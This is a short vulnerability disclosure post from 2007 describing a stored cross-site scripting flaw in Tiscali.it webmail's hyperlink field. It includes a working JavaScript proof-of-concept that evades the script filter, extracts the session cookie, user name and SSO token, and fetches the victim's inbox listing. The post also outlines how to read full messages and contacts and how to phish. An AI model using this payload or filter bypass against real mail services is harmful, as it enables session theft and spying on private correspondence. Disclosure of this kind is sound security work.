<p><a href="http://Tiscali.it">Tiscali.it</a> (big italian ISP) webmail is affected by a severe vulnerability; in the email composer a user is allowed to insert a hyperlink specifying<br>the link URL. This feature can be used to inject malicious HTML code in the form, allowing the execution of arbitrary code.
<br>On the submitted URL some security checks are performed ("<script", "script>","<script>","javascript" and similar tokens are intercepted, but "<script/xss>" isn't...).
<br>So it is possible to find a XSS vector that breaks the controls; here is an example:</p>
<p>'';!--<XSS></A><script/xss><br>var c=document.cookie; alert(c);<br>s=c.substring(c.indexOf('ssoUser')+8,c.indexOf('ssoDomain')-2);alert(s);<br>t=c.substring(c.indexOf('ssoToken=')+9,
c.indexOf('ssoToken=')+21);alert(t); <br>mailurl=unescape('/cp/ps/Mail/EmailList?search=%26sh=%26d=tiscali.it%26fi=1%26sd=Desc%26an='+s+'%26l=it%26fp=INBOX%26sc=%26u='+s+'%26t='+t+'%26ss='
);<br>xmlhttp = new ActiveXObject('Msxml2.XMLHTTP'); <br>xmlhttp.open('GET',mailurl,true);<br>xmlhttp.onreadystatechange = checkData;<br>xmlhttp.send(null);<br>function checkData(){alert(xmlhttp.readyState
);if (xmlhttp.readyState == 4) { alert(xmlhttp.responseText); }}<br></script/xss> </p>
<p>When the email with the malicious link is opened by the victim (no interaction required), the following events occur:</p>
<div>- the cookie, username and sessionId are alerted<br>- using the cookie data, an XMLHTTPRequest is made to the EmailList page that contains preview of the first N e-mails in the victim account (in the PoC I used INBOX, but all folders can be used)
<br>- the html content of the retrieved page is alerted (the page contains among <div-0>..<div-n> tags, the mail preview information fields ("from:", "subject", "date", etc.).</div>
<div> </div>
<div>Going further it is as well possible to:<br>- access the detailed content of each email<br>- access the contacts of the victim<br>- load arbitrary pages in the mailList iframe (possible phishing), using location.href
attribute</div>
<p>All the informations retrieved could be easily sent to a remote site, so allowing the attacker to spy the victim's mail activities.</p>
<div>Vuln discovered: 14/04/07<br>Vuln reported to portal owner 15/04/07 - No aswer yet</div>
<div> </div>
<div>Greetings,</div>
<div>Rosario Valotta</div>
<div> </div>
<div>[rosario dot valotta at gmail dot com]</div>